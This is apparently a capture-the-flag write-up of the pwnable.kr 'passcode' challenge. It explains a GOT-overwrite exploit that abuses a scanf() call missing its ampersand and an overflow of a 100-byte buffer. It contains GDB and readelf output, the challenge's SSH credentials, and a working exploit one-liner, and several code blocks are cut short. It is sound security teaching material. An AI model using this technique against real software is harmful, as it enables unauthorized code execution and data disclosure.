Passcode
Using scanf() to Overwrite Memory
0xd4y
July 15, 2021
0xd4y Writeups
LinkedIn: https://www.linkedin.com/in/segev-eliezer/
Email: 0xd4yWriteups@gmail.com
Table of Contents
Examining Segmentation Fault 5
Taking Advantage of name[100] 6
Understanding Dynamic Linking 11
Examining the GOT Overwrite in GDB 12
Insecure code in the passcode.c file resulted in user-control of memory that is meant to be inaccessible. The lack of boundary checks in the login() function coupled with the improper usage of the libc scanf() function, consequently lead to the execution of the /bin/cat system command upon passing a carefully constructed malicious string. Specifically, the second parameter of scanf() was not an integer pointer value as it was not prepended with an ampersand. Taking advantage of insecure code and the fact that the binary in question is dynamically linked, an attacker is capable of overwriting the GOT entry of printf() or fflush() to jump to any place in the binary’s memory.
The source code and compiled binary of the program were provided. Furthermore, the SSH credentials of the owner of this binary were given:
Username | Password |
Passcode | guest |
Before executing the binary, the program’s behavior will first be analyzed:
#include <stdio.h> |
There are three user-created functions in total: main(), welcome(), and login(). The main() function, however, is not of interest as it only calls printf() and the welcome() and login() functions. Looking at welcome(), a buffer name[100] is initialized with 100 bytes. Afterwards, the scanf() function is called with %100s as the first argument; up to 100 bytes of data are passed into the aforementioned buffer and subsequently printed out when passed into printf() (this behavior is examined in the Taking Advantage of name[100] section). After welcome() is called, the login() function is executed.
Two variables are initialized: int passcode1 and int passcode2. Following the initialization of these variables, scanf("%d", passcode1) is called, but the second argument is not an integer pointer (as it is not prepended with the ampersand symbol). Next, fflush(stdin) is called as opposed to fflush(stdout). Incidentally, usage of the former is not recommended as it can invoke strange behavior due to it being undefined. The call to fflush() is meant for output streams only in which the buffered data is outputted to the console[1]. The scanf() function is then called again in which the second argument is not prepended with the ampersand symbol. Lastly, an if statement is run which is true when passcode1 is equal to 338150 and passcode2 is equal to 13371337. On the condition that this is true, the flag located on the target system is read out.
Executing the binary with the input of 338150 for passcode1 and 13371337 for passcode2 results in a segmentation fault:
┌──(0xd4y㉿Writeup)-[~/.../other/pwnable.kr/easy/passcode] |
This behavior can be further examined using GDB, a GNU project debugger useful for dynamic analysis[2].
Running this binary in GDB, it can be seen that the program experiences a segmentation fault upon calling scanf() when moving EAX to EDX.
0xf7e23250 <__vfscanf_internal+14720> mov dword ptr [edx], eax |
Looking at the value for the EAX register reveals the input passed to the passcode2 variable:
eax 0xcc07c9 13371337 |
Therefore, the input passed into the second parameter of the scanf() function has the ability to overwrite memory.
Recall that welcome() only allocated 100 bytes to user input and implemented the scanf() function with the %s format specifier. The insecurity relating to this utilization of scanf() lies within the fact that it does not perform boundary checks on the user input. This unsafe practice results in a security hole in which user input can overflow the area in memory allocated for this buffer if the developer does not provide a safe value for the field width specifier. In the case of this binary, providing an input of larger than 100 bytes can result in the overflow of otherwise inaccessible memory located within login(). This is because the field width specifier is 100 (%100s) and 100 bytes were allocated to the name buffer. Therefore, the trailing null byte will spill into memory located right after the buffer. To demonstrate this concept, observe the following:
pwndbg> disass login |
Note the line highlighted in red which signifies the beginning of the if statement. The hex value 0x528e6 (338150 in decimal) is compared to ebp-0x10, thus at this point in memory lies passcode1. By the same token, the line highlighted in purple represents passcode2 in which 0xcc07c9 (13371337 in decimal) is compared to ebp-0xc.
pwndbg> b *login+97 |
pwndbg> x/x $ebp-0x10 |
41 in hex is ‘A’. Therefore, upon passing a large input to the name[100] buffer, the value for passcode1 can be written into. Additionally, observe the value for passcode2 located at ebp-0xc:
pwndbg> x/x $ebp-0xc |
The null byte, a byte which is automatically appended to the end of a string to signify its end, leaks into passcode2 as can be seen from the trailing 0’s. Moreover, note how although 101 A’s were passed, the last trailing A did not flood into the value for passcode2 because of the field width specification (namely %100s) in the scanf("%100s", passcode1) call.
Due to the unstable nature of this binary, passing in 338150 as passcode1 and 13371337 as passcode2 does not result in the expected execution of /bin/cat, rather a segmentation fault occurs (see Examining Segmentation Fault). Therefore, in order to execute /bin/cat, it is essential that the program is manipulated to point to an address after the if statement and before the call to the system command. Looking at the disassembly of the login() function, this leaves the following addresses: 0x080485d7, 0x080485de, and 0x080485e3. For the purposes of this report, the 0x080485d7 address is used which is 134514135 in decimal.
With the established notion that one of the aforementioned values is necessary for the desired jump to the system call, the next question is “Which memory address should be overwritten with the desired value?”. Ideally, the memory of a used function can be overwritten so as to point to one of the desired values.
Using the readelf -a passcode command, the file header, sections, and symbols (along with a lot of other information) can be seen. This facilitates the process of finding where functions are mapped onto memory.
Relocation section '.rel.plt' at offset 0x398 contains 9 entries: |
There are nine functions in total that readelf found. However, looking at the Source Code, only two functions are used before the system call and after scanf(): printf() and fflush(). Either function will work for this exploit, however in this report the printf() function is utilized. Due to this binary being in little-endian format, printf() in bytes is \x00\xa0\x04\x08.
Piecing the information found in Where to Jump and Which Function to Overwrite together, the final exploit can be constructed:
Pseudo-Exploit: JUNK_BYTE * 96 + FUNCTION_TO_OVERWRITE + WHERE_TO_JUMP
Exploit: python -c “print ‘A’*96 + ‘\x00\xa0\x04\x08’ + ‘134514135’
passcode@pwnable:~$ python -c "print 'A'*96 + '\x00\xa0\x04\x08' + '134514135'" |./passcode |
The binary exploited in this report was unstripped and dynamically linked:
┌──(0xd4y㉿Writeup)-[~/.../other/pwnable.kr/easy/passcode] |
The fact that it was dynamically linked played an essential role in making the exploit succeed. To understand exactly how it worked, it is important to realize what dynamic linking is and how it operates.
When a binary is dynamically linked, the libc calls within the program do not point to any meaningful addresses. Take the following snippet from passcode for example:
0x08048593 <+47>: call 0x8048430 <fflush@plt> |
Note the text highlighted in red. The program calls fflush() and printf() which are at 0x8048430 and 0x8048420 respectively. Since this binary is dynamically linked, before the binary is ever run, fflush() and printf() (and any other libc function for that matter) refer to placeholder addresses such as 0x00000000. However, once the program is loaded, these addresses are resolved using the help of the Global Offset Table (GOT) and Procedure Linkage Table (PLT), a table which converts position-independent function calls to absolute locations[3]. When a libc function is called, the first thing the PLT does is jump to the GOT (Global Offset Table) entry of the called function. The GOT maps symbols (such as printf()) to their actual location[4]. Thus, when the exploit was passed into the binary, the GOT entry which maps printf() to its actual location was overwritten to instead point to 0x080485d7.
The way the binary handles the malicious input can be examined more in detail within GDB. After disassembling the login() function, it can be seen that the printf() call that occurs after scanf() is at login+60 (or 0x080485a0):
0x080485a0 <+60>: call 0x8048420 <printf@plt> |
After setting a breakpoint at this function and passing in the exploit, the breakpoint gets hit:
pwndbg> b *login+60 |
It was established that this exploit works. Therefore, somewhere within memory the address 0x80485d7 is loaded up. To find its exact location, the info proc mappings and find command within GDB can be utilized:
pwndbg> info proc mappings |
Recall that 134514135 is 0x080485d7 in hex and it points to the location between the if statement and system call.
pwndbg> p/x 134514135 |
Note that the find command has the syntax find _start_address, _end_address, _what_to_look_for
The pointer for printf() was successfully overwritten to 0x08045d7. Observe that this is different from the printf pointer before the exploit:
pwndbg> x/x 0x804a000 |
When stepping one instruction, it is expected that from the printf() call, the program will look at the GOT entry of printf(). The program will then be tricked to believe that the code for printf() can be found at 0x08045d7, and the EIP will therefore point to 0x08045d7:
=> 0x080485a0 <+60>: call 0x8048420 <printf@plt> pwndbg> x/x $eip pwndbg> s |
Observe the instruction pointer (EIP) which jumped to the location between the if statement and system call.
The binary was successfully exploited which resulted in the leakage of otherwise inaccessible data. Compiler warnings should never be ignored. Unsafe practices involving user-input can lead to security holes. The scanf() function was improperly used, and is not recommended when dealing with strings (unless the developer is careful of the field width specifier and allocated buffer size). Furthermore, the second argument of scanf() was not prepended with the ampersand symbol, which allowed for the passing of an address causing the overwrite of printf(). The following remediations should be strongly considered:
The aforementioned remediations should be followed as soon as possible to prevent the attack described in this report. It is essential that the developer follow safe programming practices especially when dealing with user-input.